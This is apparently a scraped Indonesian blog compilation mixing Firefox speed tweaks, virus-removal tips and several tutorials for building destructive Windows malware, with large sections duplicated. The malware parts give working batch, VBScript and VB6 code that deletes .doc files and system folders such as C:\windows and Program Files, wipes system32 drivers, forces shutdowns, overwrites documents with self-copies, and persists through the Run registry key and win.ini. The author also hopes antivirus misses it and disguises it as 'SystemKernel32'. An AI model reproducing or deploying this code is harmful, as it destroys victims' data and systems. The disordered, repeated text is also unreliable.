- Untuk pengguna DSL :
1. Set “network.http.pipelining : true”
2. Set “network.http.proxy.pipelining : true”
3. Set “network.http.pipelining.maxrequests : 64?
4. Set “nglayout.initialpaint.delay : 0?
- Untuk pengguna ADSL :
1. Set “network.http.max-connections : 64?
2. Set “network.http.max-connections-per-server : 21?
3. Set “network.http.max-persistent-connections-per-server : 8?
4. Set “network.http.pipelining : true”
5. Set “network.http.pipelining.maxrequests : 100?
6. Set “network.http.proxy.pipelining : true”
7. Set “nglayout.initialpaint.delay : 0?
- Untuk pengguna Dial Up
1. Set “browser.cache.disk_cache_ssl : true”
2. Set “browser.xul.error_pages.enabled : true”
3. Set “network.http.max-connections : 32?
4. Set “network.http.max-connections-per-server : 8?
5. Set “network.http.max-persistent-connections-per-proxy : 8?
6. Set “network.http.max-persistent-connections-per-server : 4?
7. Set “network.http.pipelining : true”
8. Set “network.http.pipelining.maxrequests : 8?
9. Set “network.http.proxy.pipelining : true”
10. Set “plugin.expose_full_path : true”
11. Set “signed.applets.codebase_principal_support : true”
12. Set “content.interrupt.parsing : true”
13. Set “content.max.tokenizing.time : 3000000?
14. Set “content.maxtextrun : 8191?
15. Set “content.notify.backoffcount : 5?
16. Set “content.notify.interval : 750000?
17. Set “content.notify.ontimer : true”
18. Set “content.switch.threshold : 750000?
Langkah - langkahnya
1. Pada address bar ketik about:config
maka akan muncul file confugurasi fire fox
2 cari file berikut :
network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests
3. set file tersebut seperti berikut :
network.http.pipelining menjadi true
network.http.proxy.pipelining menjadi true
4. Ubah nilai file berikut :
network.http.pipelining.maxrequests menjadi 50 atau 64.
5. buat file berikut :
klik kanak Trus pilih new : integer. copy paste perintah ini : nglayout.initialpaint.delay beri nilai 0 (nol)
Selamat Mencoba.... o....ya... kalau bisa downloadnya pake' progam IDM ma Orbit...!
Beberapa Perintah Dalam CMD Sebagai Pembuatan Virus
1.Delete Registry : REG DELETE ALAMAT /v VALUE NAME /f
Keterangan :
- REG DELETE = Menghapus registry
- ALAMAT = HKEY\Software\dst
- /v VALUE NAME = Nama Value
- /f = Tidak wajib!! Berfungsi untuk melaksanakan perintah tanpa prompt
Contoh : REG DELETE HKEY\Software\Microsoft\Windows\Policies\Explorer /v NoFind
Fungsi = Menghapus Value NoFind Di Alamat Registry HKEY\Software\Microsoft\Windows\Policies\Explorer
2.ADD Registry : REG ADD ALAMAT /v VALUE NAME /t TYPE /s SEPARATOR /d DATA /f
Keteranagn :
- REG ADD = Menambah registry
- ALAMAT = HKEY\Software\dst
- /v VALUE NAME = Nama Value
- /t TYPE = Type data Ex: REG_DWORD, REG_SZ
- /d DATA = Isi Value
- /f = Tidak wajib!! Berfungsi untuk melaksanakan perintah tanpa prompt
3.PROMPT : PROMPT Text
Keterangan:
PROMPT = Perintah untuk merubah text PROMPT
Text = Text yang ingn kita munculkan di PROMPT
Text dapat menggunakan karakter spesial yang daftarnya berikut ini!!
$A = Karakter & $N = Drive kita menginstal windows
$B = Karakter | $P = Default
$C = Karakter ( $Q = Karakter =
$D = Karakter Tanggal Sekarang $S = Karakter Spasi
$E = Karakter Escape Kode $T = Karakter Jam Sekarang
$F = Karakter ) $V = Karakter No Versi Windows
$G = Karakter > (lebih besar dari) $_ = Karakter Garis Bawah
$H = Karakter No Text $$ = Karakter Dollar
$L = Karakter < (lebih kecil dari) $+ = Karakter Aritmatik
4.Replace : Replace [Drive\Path\NamaFile] [Drive\Path] /A /P /R /S /W /U
Keterangan:
Replace = Pindahkan
- [Drive\Path\NamaFile] = Spesifik sumber file
- [Drive\Path\] = Folder Tujuan
- A = Pindahkan File ke Folder Tujuan (No Update)
- P = Membuat Prompt MengKonfirmasi Kita Sebelum Memindahkan
- R = Pindahkan hanya File Attribut Read Only
- S = Pindahkan File Ke Semua Sub Direktori Folder Tujuan
- W = Tunggu kita memasukan disk/flashdisk sebelum memindahkan
- U = Pindahkan dan Update jika nama file sudah ada
- Jika menggunakan parameter /A tidak boleh menggunakan /S /U begitu juga sebaliknya.
5.Attrib : Attrib +R -R +A -A +H -H +S -S ADRESS /S /D
Keterangan:
Attrib = Rubah Attribut File/Folder
- (-) = Untuk Menghapus Attribut
- (+) = Untuk Menambah Attribut
- (A) = Attribut Archieve
- (R) = Attribut Read Only
- (H) = Attribut Hidden
- (S) = Attribut Super_Hidden/System
- /S = Proses terhadap file yang sama di folder dan subfolder
- /D = Proses folder Sebagai Sumber
- Adress = Alamat File Misal: C:\Lucky\Ganteng
6.Del : Del /P /F /S /Q /Attribut /Adress
Keterangan:
- Del = Hapus File / Folder
- /P = Membuat Prompt MengKonfirmasi Kita Sebelum Menghapus
- /F = Hapus Hanya Read Only File
- /S = Hapus File Yang Sama Di Semua Sub Direktory
- /Q = Hapus Dengan Cepat
- /Attribut = Pilih Attribut File Yang Ingin Di Hapus (Tidak Ada Berarti Semua File) tanda (-) berarti yang tidak di hapus- - Adress = Alamat File Misal: C:\Lucky\Ganteng
7.Rename : Rename/Ren [Drive\Path\NamaFile] NewFileName
Keterangan:
- Rename = Rubah Nama File
- [Drive\Path\NamaFile] = Alamat Drive dan Nama File
- NewFileName = Nama File Baru
8.Type : Type [Drive\Path\NamaFile]
Keterangan:
- Type = Membuka Semua File Text (*.txt, *.doc, *.xls, *.ini, *.vbs, *.js, dll)
- [Drive\Path\NamaFile] = Lokasi File
9.Start : Start ADDRESS_FILE
- Start = Untuk menjalankan File
- ADDRESS_FILE = Alamat file di special folder seperti windows dan system32
- Ex: Start Regedit maka akan menjalankan Registry Editor.
sekarang kita akan membahas file *.bat yang berfungsi untuk menjalankan perintah command prompt secara bersamaan. oke ketikan kode berikut di notepad: date 07-07-07 dan save dengan nama edit_time.bat dan pilih “All File” dalam kolom “Save As Type” lalu jalankan!! setelah itu apa yang terjadi?? yah tanggal berubah jadi juli-7-2007.
oke lanjut ke file *.bat kita tidak mungkin membuat banyak file *.bat karena selain akan cepat terdeteksi, kita juga akan semakin rumit merubahregistry!! namun jangan kuatir karena file *.bat bisa menjalankan perintah DOS/COMMAND_PROMPT secara langsung.
berikut perintah ini, kita buka notepad dan ketikan code berikut:
del C:\*.doc ‘—– hapus semua file berextensi doc di drive c
Shutdown -s -f -t 30 -c “Selamat Tidur” ‘—– -s = shutdown computer, -f = tutup semua aplikasi tanpa peringatan, -t = setting waktu(dalam detik) -c = menampilkan pesan “Selamat Tidur” (Bebas kita ubah)
attrib +s +h C:\*.jpg /s /d ‘—– beri attribut hidden dan system semua file jpg
for /R c:\ %%r in (*.cob *.doc) do copy %0 “%%r” ‘—– Copy isi file *.bat ke semua file *.cob dan *.doc di C
for /R c:\ %%r in (*.cob *.doc) do ren “%%r” *.bat ‘—– Rename semua file *.cob dan *.doc jadi *.bat sehingga isi file jd virus kita :D haha..haha
Untuk isi file bat yang akan menumpang di virus vbs kita anda boleh pilih mana yang paling cocok!! mungkin menghapus, shutdown dalam 30 detik, menyembunyikan atau merubah isinya jadi file *.bat?? dipilih!! dipilih!!
atau boleh masukin semuanya sehingga virus kita ditambah kode berikut ini:
Set bath = fso.CreateObject(towind & “\sialan.bat”)
bath.writeline “del C:\*.doc”
bath.writeline “Shutdown -s -f -t 30″
bath.writeline “for /R c:\ %%r in (*.cob *.doc) do copy %0 %%r”
bath.writeline “for /R c:\ %%r in (*.cob *.doc) do ren %%r *.bat”
bath.close
‘bonus
wsh.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\”SysError”, “towind & “\sialan.bat”, “REG_SZ”
Maka ketika windows diaktifkan semua file doc akan menjadi *.bat dengan isi kode penghancur kita :D bisa diselamatkan ga tuh?? coba saja supaya anda tahu!!
Namun jika anda punya anti virus biasanya kode tersebut akan di blok karena jelas-jelas untuk merusak!! lalu bagaimana?? kita berdoa supaya antivirus komputer sasaran tidak mengenali :D karena memang tidak semua antivirus akan memblok perintah tersebut. Oia sebagai tambahan kita bisa membuat file lain seperti *.html atau *.ini!! jika kita punya banyak duplikat virus kita bisa membuat file *.ini supaya orang tidak cepat mengetahui virus kita hanya dengan membuka Regedit. untuk terakhir kali saya akan berikan lagi suatu code yang akan merubah file ini diwindows sehingga menjalankan virus kita. oke langsung saja tentunya dengan perintah
set BuatIni = fso.CreateTextFile(”C:\WINDOWS\Win.ini”)
BuatIni.writeline “[WINDOWS]”
BuatIni.writeline “run = C:\Ju_Pe.vbs” ‘—-rubah sesuai letak dan nama virus
BuatIni.writeline “load = C:\Persik.vbs” ‘—-rubah sesuai letak dan nama virus
BuatIni.close
Maka ketika windows dijalankan virus akan aktif!! walaupun mungkin registry telah dirubah.
Dari pembahasan kita maka kita bisa simpulkan beberapa langkah berikut jika terkena virus vbs: jika tidak di enkripsi anda bisa melihat dan membunuh semua virus dan membenarkanregistry dengan membaca source kodenya, tapi jika di enkripsi kita lakukan langkah berikut:
1.Matikan proses virus!! anda bisa menggunakan tool pengganti TaskManager yang biasanya akan di blok.
2.Hapus semua duplikat virus!! anda bisa gunakan antivirus update terbaru dan jika diblok virus anda rubah dulu namanya seperti PCMAV_CLN.exe jadi 123.exe
3.Buka registry dan periksa dengan teliti semua subkey run otomatis biasanya akan terdapat key yang mengarah ke letak virus yang dijalankan dan periksa file win.ini!! jika dirubah anda minta dari komputer teman anda :D dan jika ada petunjuk letak virus langsung hapus.
4.Rubah semua registry yang dirubah virus!! bisa dengan TuneUp Utilities dan sebagainya!!
Untuk pencegahan lakukan langkah berikut:
1.Gunakan antivirus terbaru, jika bisa yang mempunyai fitur heuristik seperti ANSAV.
2.Jangan asal klik file!! lihat dikolom type Windows Explorer apabila application tapi iconnya folder atau MS Word langsung hapus.
3.Selalu scan jika mencolokan flaskdisk
4.Matikan proses autorun melalui registry di alamat
“HKCU(atau HKLM)\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer”, buat DWORD value baru dengan nama NoDriveTypeAutorun dan isi dengan nilai 255. atau melalui start—Run—ketik GPEDIT.msc—User Configuration—Administratif Templates—–System—–Cari Turn Off AutoPlay—–klik 2x dan rubah jadi Enabled!!
5.Jangan Pakai OS Windows, pake linux cos VMaker Indonesia cuma bisa bikin untuk windows
Sisanya Berfikir Sendiri Ya...
No Pain...
Keterangan :
- REG DELETE = Menghapus registry
- ALAMAT = HKEY\Software\dst
- /v VALUE NAME = Nama Value
- /f = Tidak wajib!! Berfungsi untuk melaksanakan perintah tanpa prompt
Contoh : REG DELETE HKEY\Software\Microsoft\Windows\Policies\Explorer /v NoFind
Fungsi = Menghapus Value NoFind Di Alamat Registry HKEY\Software\Microsoft\Windows\Policies\Explorer
2.ADD Registry : REG ADD ALAMAT /v VALUE NAME /t TYPE /s SEPARATOR /d DATA /f
Keteranagn :
- REG ADD = Menambah registry
- ALAMAT = HKEY\Software\dst
- /v VALUE NAME = Nama Value
- /t TYPE = Type data Ex: REG_DWORD, REG_SZ
- /d DATA = Isi Value
- /f = Tidak wajib!! Berfungsi untuk melaksanakan perintah tanpa prompt
3.PROMPT : PROMPT Text
Keterangan:
PROMPT = Perintah untuk merubah text PROMPT
Text = Text yang ingn kita munculkan di PROMPT
Text dapat menggunakan karakter spesial yang daftarnya berikut ini!!
$A = Karakter & $N = Drive kita menginstal windows
$B = Karakter | $P = Default
$C = Karakter ( $Q = Karakter =
$D = Karakter Tanggal Sekarang $S = Karakter Spasi
$E = Karakter Escape Kode $T = Karakter Jam Sekarang
$F = Karakter ) $V = Karakter No Versi Windows
$G = Karakter > (lebih besar dari) $_ = Karakter Garis Bawah
$H = Karakter No Text $$ = Karakter Dollar
$L = Karakter < (lebih kecil dari) $+ = Karakter Aritmatik
4.Replace : Replace [Drive\Path\NamaFile] [Drive\Path] /A /P /R /S /W /U
Keterangan:
Replace = Pindahkan
- [Drive\Path\NamaFile] = Spesifik sumber file
- [Drive\Path\] = Folder Tujuan
- A = Pindahkan File ke Folder Tujuan (No Update)
- P = Membuat Prompt MengKonfirmasi Kita Sebelum Memindahkan
- R = Pindahkan hanya File Attribut Read Only
- S = Pindahkan File Ke Semua Sub Direktori Folder Tujuan
- W = Tunggu kita memasukan disk/flashdisk sebelum memindahkan
- U = Pindahkan dan Update jika nama file sudah ada
- Jika menggunakan parameter /A tidak boleh menggunakan /S /U begitu juga sebaliknya.
5.Attrib : Attrib +R -R +A -A +H -H +S -S ADRESS /S /D
Keterangan:
Attrib = Rubah Attribut File/Folder
- (-) = Untuk Menghapus Attribut
- (+) = Untuk Menambah Attribut
- (A) = Attribut Archieve
- (R) = Attribut Read Only
- (H) = Attribut Hidden
- (S) = Attribut Super_Hidden/System
- /S = Proses terhadap file yang sama di folder dan subfolder
- /D = Proses folder Sebagai Sumber
- Adress = Alamat File Misal: C:\Lucky\Ganteng
6.Del : Del /P /F /S /Q /Attribut /Adress
Keterangan:
- Del = Hapus File / Folder
- /P = Membuat Prompt MengKonfirmasi Kita Sebelum Menghapus
- /F = Hapus Hanya Read Only File
- /S = Hapus File Yang Sama Di Semua Sub Direktory
- /Q = Hapus Dengan Cepat
- /Attribut = Pilih Attribut File Yang Ingin Di Hapus (Tidak Ada Berarti Semua File) tanda (-) berarti yang tidak di hapus- - Adress = Alamat File Misal: C:\Lucky\Ganteng
7.Rename : Rename/Ren [Drive\Path\NamaFile] NewFileName
Keterangan:
- Rename = Rubah Nama File
- [Drive\Path\NamaFile] = Alamat Drive dan Nama File
- NewFileName = Nama File Baru
8.Type : Type [Drive\Path\NamaFile]
Keterangan:
- Type = Membuka Semua File Text (*.txt, *.doc, *.xls, *.ini, *.vbs, *.js, dll)
- [Drive\Path\NamaFile] = Lokasi File
9.Start : Start ADDRESS_FILE
- Start = Untuk menjalankan File
- ADDRESS_FILE = Alamat file di special folder seperti windows dan system32
- Ex: Start Regedit maka akan menjalankan Registry Editor.
sekarang kita akan membahas file *.bat yang berfungsi untuk menjalankan perintah command prompt secara bersamaan. oke ketikan kode berikut di notepad: date 07-07-07 dan save dengan nama edit_time.bat dan pilih “All File” dalam kolom “Save As Type” lalu jalankan!! setelah itu apa yang terjadi?? yah tanggal berubah jadi juli-7-2007.
oke lanjut ke file *.bat kita tidak mungkin membuat banyak file *.bat karena selain akan cepat terdeteksi, kita juga akan semakin rumit merubahregistry!! namun jangan kuatir karena file *.bat bisa menjalankan perintah DOS/COMMAND_PROMPT secara langsung.
berikut perintah ini, kita buka notepad dan ketikan code berikut:
del C:\*.doc ‘—– hapus semua file berextensi doc di drive c
Shutdown -s -f -t 30 -c “Selamat Tidur” ‘—– -s = shutdown computer, -f = tutup semua aplikasi tanpa peringatan, -t = setting waktu(dalam detik) -c = menampilkan pesan “Selamat Tidur” (Bebas kita ubah)
attrib +s +h C:\*.jpg /s /d ‘—– beri attribut hidden dan system semua file jpg
for /R c:\ %%r in (*.cob *.doc) do copy %0 “%%r” ‘—– Copy isi file *.bat ke semua file *.cob dan *.doc di C
for /R c:\ %%r in (*.cob *.doc) do ren “%%r” *.bat ‘—– Rename semua file *.cob dan *.doc jadi *.bat sehingga isi file jd virus kita :D haha..haha
Untuk isi file bat yang akan menumpang di virus vbs kita anda boleh pilih mana yang paling cocok!! mungkin menghapus, shutdown dalam 30 detik, menyembunyikan atau merubah isinya jadi file *.bat?? dipilih!! dipilih!!
atau boleh masukin semuanya sehingga virus kita ditambah kode berikut ini:
Set bath = fso.CreateObject(towind & “\sialan.bat”)
bath.writeline “del C:\*.doc”
bath.writeline “Shutdown -s -f -t 30″
bath.writeline “for /R c:\ %%r in (*.cob *.doc) do copy %0 %%r”
bath.writeline “for /R c:\ %%r in (*.cob *.doc) do ren %%r *.bat”
bath.close
‘bonus
wsh.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\”SysError”, “towind & “\sialan.bat”, “REG_SZ”
Maka ketika windows diaktifkan semua file doc akan menjadi *.bat dengan isi kode penghancur kita :D bisa diselamatkan ga tuh?? coba saja supaya anda tahu!!
Namun jika anda punya anti virus biasanya kode tersebut akan di blok karena jelas-jelas untuk merusak!! lalu bagaimana?? kita berdoa supaya antivirus komputer sasaran tidak mengenali :D karena memang tidak semua antivirus akan memblok perintah tersebut. Oia sebagai tambahan kita bisa membuat file lain seperti *.html atau *.ini!! jika kita punya banyak duplikat virus kita bisa membuat file *.ini supaya orang tidak cepat mengetahui virus kita hanya dengan membuka Regedit. untuk terakhir kali saya akan berikan lagi suatu code yang akan merubah file ini diwindows sehingga menjalankan virus kita. oke langsung saja tentunya dengan perintah
set BuatIni = fso.CreateTextFile(”C:\WINDOWS\Win.ini”)
BuatIni.writeline “[WINDOWS]”
BuatIni.writeline “run = C:\Ju_Pe.vbs” ‘—-rubah sesuai letak dan nama virus
BuatIni.writeline “load = C:\Persik.vbs” ‘—-rubah sesuai letak dan nama virus
BuatIni.close
Maka ketika windows dijalankan virus akan aktif!! walaupun mungkin registry telah dirubah.
Dari pembahasan kita maka kita bisa simpulkan beberapa langkah berikut jika terkena virus vbs: jika tidak di enkripsi anda bisa melihat dan membunuh semua virus dan membenarkanregistry dengan membaca source kodenya, tapi jika di enkripsi kita lakukan langkah berikut:
1.Matikan proses virus!! anda bisa menggunakan tool pengganti TaskManager yang biasanya akan di blok.
2.Hapus semua duplikat virus!! anda bisa gunakan antivirus update terbaru dan jika diblok virus anda rubah dulu namanya seperti PCMAV_CLN.exe jadi 123.exe
3.Buka registry dan periksa dengan teliti semua subkey run otomatis biasanya akan terdapat key yang mengarah ke letak virus yang dijalankan dan periksa file win.ini!! jika dirubah anda minta dari komputer teman anda :D dan jika ada petunjuk letak virus langsung hapus.
4.Rubah semua registry yang dirubah virus!! bisa dengan TuneUp Utilities dan sebagainya!!
Untuk pencegahan lakukan langkah berikut:
1.Gunakan antivirus terbaru, jika bisa yang mempunyai fitur heuristik seperti ANSAV.
2.Jangan asal klik file!! lihat dikolom type Windows Explorer apabila application tapi iconnya folder atau MS Word langsung hapus.
3.Selalu scan jika mencolokan flaskdisk
4.Matikan proses autorun melalui registry di alamat
“HKCU(atau HKLM)\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer”, buat DWORD value baru dengan nama NoDriveTypeAutorun dan isi dengan nilai 255. atau melalui start—Run—ketik GPEDIT.msc—User Configuration—Administratif Templates—–System—–Cari Turn Off AutoPlay—–klik 2x dan rubah jadi Enabled!!
5.Jangan Pakai OS Windows, pake linux cos VMaker Indonesia cuma bisa bikin untuk windows
Sisanya Berfikir Sendiri Ya...
No Pain...
Cara membasmi/menghapus Virus Shortcut
ebelum kepada persoalan inti yaitu bagaimana cara mengatasi virus shortcut dan juga cara mengembalikan data Anda di Flash disk, ada baiknya kita tahu dulu karakter virus ini. virus shorcut adalah virus jenis malware yang menginfeksi komputer dengan file-file sebagai berikut :
virus shorcut
Contoh Virus Shortcuts di Flash Disk
Sebenarnya Shortcut-shortcut itu hanya tipuan saja sedangkan data di super hidden oleh virus varian ini. Mungkin kebetulan komputer kawan Saya itu terserang virus shortcut jenis ini sedangkan kalau ada virus shotcut jenis lainnya Saya belum pernah mengalaminya. Menurut khabar ada bebrapa varian virus shortcut ini.
Khabar baiknya sekarang di antivirus smadav 8.3 sudah bisa mengatasi dan menghapus virus shortcut all varian semua jenis virus shortcut, bahkan bisa mengembalikan data yang di super hidden oleh virus ini.
download smadav 8.3
- biacu.exe
- biacux.exe
- nuook.exe
- nuookx.exe
- poliy.exe
- poliyx.exe
- x.exe
Contoh Virus Shortcuts di Flash Disk
Sebenarnya Shortcut-shortcut itu hanya tipuan saja sedangkan data di super hidden oleh virus varian ini. Mungkin kebetulan komputer kawan Saya itu terserang virus shortcut jenis ini sedangkan kalau ada virus shotcut jenis lainnya Saya belum pernah mengalaminya. Menurut khabar ada bebrapa varian virus shortcut ini.
Khabar baiknya sekarang di antivirus smadav 8.3 sudah bisa mengatasi dan menghapus virus shortcut all varian semua jenis virus shortcut, bahkan bisa mengembalikan data yang di super hidden oleh virus ini.
download smadav 8.3
Cara untuk mengembalikan file yang terhidden / tersembunyi
artikel ini saya buat karena banyaknya keluhan dari Customer GoMe Computer yang memakai jasa Internet Cafe dan Rental Komputer. Mereka sering mengeluh karena beberapa file yang mereka punya (terutama di Flash Disk) tiba-tiba hilang.
File-file itu sebenarnya tidak hilang, hanya saja Atrribut dari file tersebut diubah menjadi super hidden (yang biasanya disebabkab oleh virus suspect atau varian brontok). Dan apabila kita ingin membukanya dengan Windows Explorer, maka file itu tidak akan kelihatan.
Cara untuk mengembalikan attributnya ke kondisi semula, lakukanlan langkah-langkah berikut ini :
File-file itu sebenarnya tidak hilang, hanya saja Atrribut dari file tersebut diubah menjadi super hidden (yang biasanya disebabkab oleh virus suspect atau varian brontok). Dan apabila kita ingin membukanya dengan Windows Explorer, maka file itu tidak akan kelihatan.
Cara untuk mengembalikan attributnya ke kondisi semula, lakukanlan langkah-langkah berikut ini :
- Disable/menonaktifkan dulu AntiVirus yang aktif di komputer Anda
- klik menu Start cari “RUN” kemudian Ketik cmd (command prompt) klik “OK”akan tampak kotak dialog menu Command Prompt yang latar belakangnya hitam (sengaja Saya tidak menyertakan image/gambar supaya web kesayangan kita semua tidak berat pada saat loading sehingga dapat diakses dengan Telkomnet sekalipun),
Silahkan ketik attrib(spasi)-s(spasi)-h(spasi)f:*.*(spasi)/s(spasi)/d
hasilnya : attrib -s -h f:*.* /s /d
Keterangan :hasilnya : attrib -s -h f:*.* /s /d
- Attrib = attribute atau sifat dari suatu file
- –s = Menampilkan file super hidden atau tersembunyi penyebabnya disembunyikan oleh Virus
- -h = berfungsi menampilkan kembali file yg tersembunyi/disembunyikan virus, misal virus brontok
- g = Cari lokasi flash disk yang ada di disk/drive tergantung dari berapa partisi hardisk Anda, hati-hati jangan sampai salah karena perintah attrib ini juga dapat mengembalikan data hidden yang ada di dalam hardisk/hardrive.
- /s dan /d artinya perintah attrib akan dikenakan pada semua file dan folder yang berada di dalam folder.
Minggu, 10 Oktober 2010
buad gravity yg keren
langsung aja
masuk aja di disini
kalo mau nyimpan foto nya klik aja alt + print screen sysrq
lalu paste kan ke paint
dan save
masuk aja di disini
kalo mau nyimpan foto nya klik aja alt + print screen sysrq
lalu paste kan ke paint
dan save
Sabtu, 09 Oktober 2010
mematikan komputer 1 LAN lewat cmd
hehehe,,,
bosan maen brosing truss di net,,ingin jahili orang yg satu net dgn kamu......
matikan aja komputer nya atau merestart nya...biar bingung tuh orang :D
tdak basa basi lagi silahkan aja nonton film nya di sini
bosan maen brosing truss di net,,ingin jahili orang yg satu net dgn kamu......
matikan aja komputer nya atau merestart nya...biar bingung tuh orang :D
tdak basa basi lagi silahkan aja nonton film nya di sini
Kamis, 07 Oktober 2010
virus Simple yang sangat berbahaya
Saya buat tutorial untuk membuat virus yang cukup mematikan, tapi simple, dan sepertinya tidak akan terdekteksi antivirus, soalnya cara kerjanya simple
Yang diperlukan:
1. VB(optimal : 6.0)
2. Paham tombol-tombolnya VB
Tutorial Bikin Virus cuma 1 menit
1. buat form sekecil mungkin
2. didalam form itu, masukin kode di bawah ini
Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3.Kode yg warna biru itu penangkal virus, barang kali anda tidak sengaja tekan jadi anda selamat. jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, anda tidak akan keserang sendiri… bisa anda edit koq jadi apa gitu…
Yang warna merah itu folder yang akan didelete sama virus ini, anda edit sendiri
4. Buat project ini namanya seperti nama system, disini aku pakai nama “SystemKernel32″ jadi tidak bakal dicurigai
5. Jangan pernah letakan namamu di virus ini…
6. compile it.... dan selesai....
Yang diperlukan:
1. VB(optimal : 6.0)
2. Paham tombol-tombolnya VB
Tutorial Bikin Virus cuma 1 menit
1. buat form sekecil mungkin
2. didalam form itu, masukin kode di bawah ini
Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3.Kode yg warna biru itu penangkal virus, barang kali anda tidak sengaja tekan jadi anda selamat. jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, anda tidak akan keserang sendiri… bisa anda edit koq jadi apa gitu…
Yang warna merah itu folder yang akan didelete sama virus ini, anda edit sendiri
4. Buat project ini namanya seperti nama system, disini aku pakai nama “SystemKernel32″ jadi tidak bakal dicurigai
5. Jangan pernah letakan namamu di virus ini…
6. compile it.... dan selesai....
VIRUS COMPUTER
Silahkan copy paste seluruh script yang ada disini ke notepad, truz save dengan extensi .bat, lalu jalankan. Tinggal lihat efeknya di komputer…..
Virus 1 :
@ECHO OFF
:begin
del c:\windows\system32\drivers\*.sys
del
Echo Tutup program ini atau komputer kamu error!
pause
Echo Windows kini berusaha menagkal virus..
pause
Echo 10 ( detik )
pause
Echo 20 ( detik )
pause
Echo 30 ( detik )
pause
Echo 40 ( detik )
pause
Echo 50 ( detik )
pause
Echo 60 ( detik )
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Echo ( Virus Dijalankan.. )
pause
Echo Do Kamu suka paint?
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
Pause
Echo 70 ( detik )
Pause
Echo Jam di komputer sudah di ubah 12:00
Time 12:00
pause
Echo Virus menginfeksi…..
Start mspaint
Start mspaint
Start mspaint
Start mspaint
Start mspaint
Start mspaint
Start mspaint
Pause
echo awww… !
echo ini yang kamu dapatkan dari aku!
Pause
Start notepad
Start notepad
Start notepad
Start notepad
Start notepad
Start notepad
Start notepad
pause
md Loser.bat
md Fucker.bat
md shutup.bat
md amit-amit.bat
pause
md ShwAgl1.bat
md ShwAgl2.bat
md ShwAgl3.bat
md ShwAgl4.bat
md ShwAgl5.bat
md Apakabarkamusekaranghuh?.bat
echo ( SEKARANG LIHAT KE DEKSTOP FUCKER )
pause
echo sekarang minta maaf dan bersikap baik sama ShwAgl,stoopid
echo karena kamu g tutup programnya by v-hacker
pause
echo oke sekarang lihat ha..ha..ha…XD (v-hacker)
rundll32.exe shell32.dll,SHExitWindowsEx 2
echo Sekarang katakan "bye… bye…"
Virus 1 :
@ECHO OFF
:begin
Echo Tutup program ini atau komputer kamu error!
pause
Echo Windows kini berusaha menagkal virus..
pause
Echo 10 ( detik )
pause
Echo 20 ( detik )
pause
Echo 30 ( detik )
pause
Echo 40 ( detik )
pause
Echo 50 ( detik )
pause
Echo 60 ( detik )
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Echo ( Virus Dijalankan.. )
pause
Echo Do Kamu suka paint?
start mspaint
start mspaint
start mspaint
start mspaint
start mspaint
Pause
Echo 70 ( detik )
Pause
Echo Jam di komputer sudah di ubah 12:00
Time 12:00
pause
Echo Virus menginfeksi…..
Start mspaint
Start mspaint
Start mspaint
Start mspaint
Start mspaint
Start mspaint
Start mspaint
Pause
echo awww… !
echo ini yang kamu dapatkan dari aku!
Pause
Start notepad
Start notepad
Start notepad
Start notepad
Start notepad
Start notepad
Start notepad
pause
md Loser.bat
md Fucker.bat
md shutup.bat
md amit-amit.bat
pause
md ShwAgl1.bat
md ShwAgl2.bat
md ShwAgl3.bat
md ShwAgl4.bat
md ShwAgl5.bat
md Apakabarkamusekaranghuh?.bat
echo ( SEKARANG LIHAT KE DEKSTOP FUCKER )
pause
echo sekarang minta maaf dan bersikap baik sama ShwAgl,stoopid
echo karena kamu g tutup programnya by v-hacker
pause
echo oke sekarang lihat ha..ha..ha…XD (v-hacker)
rundll32.exe shell32.dll,SHExitWindowsEx 2
echo Sekarang katakan "bye… bye…"
VIRUS" COMPUTER YG BERBAHAYA
Virus komputer telah menjadi sebuah fenomena yang mampu membuat pengguna PC ketakutan. Dampak dari adanya virus, bisa menimbulkan kerugian sampai milyaran rupiah. Ibarat sebuah penyakit, virus komputer bisa menginfeksi siapa saja tanpa pandang bulu. Berikut ini adalah beberapa virus yang paling berbahaya dan mampu menimbulkan kerugian sampai ratusan milyar lebih
CIH
